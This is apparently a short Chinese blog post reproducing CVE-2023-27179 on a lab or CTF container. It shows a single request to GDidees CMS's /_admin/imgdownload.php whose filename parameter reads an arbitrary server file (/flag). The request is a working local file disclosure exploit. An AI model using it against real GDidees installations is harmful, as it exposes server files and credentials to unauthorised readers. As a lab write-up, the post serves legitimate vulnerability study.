CVE-2023-27179 复现

题目描述:

GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。

实际攻击:开启容器后访问url如下
https://eci-2ze5gnqeym8bbt48nwsv.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=/flag
然后就能够直接下载这个文件的扩展名为png的形式.后端代码就不去分析了,干了啥基本也能猜到...

posted @   meraklbz  阅读(50)  评论(0编辑  收藏  举报
相关博文:
·  CVE-2023-1313 复现
·  CVE-2023-2130 复现
·  GDidees CMS v3.9.1 本地文件泄露漏洞(CVE-2023-27179)靶场复现
·  【漏洞复现】74cmsSEv3.4.1任意文件读取漏洞(CVE-2022-26271)
·  漏洞复现之CVE-2012-1823(PHP-CGI远程代码执行)
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示
AI IDE Trae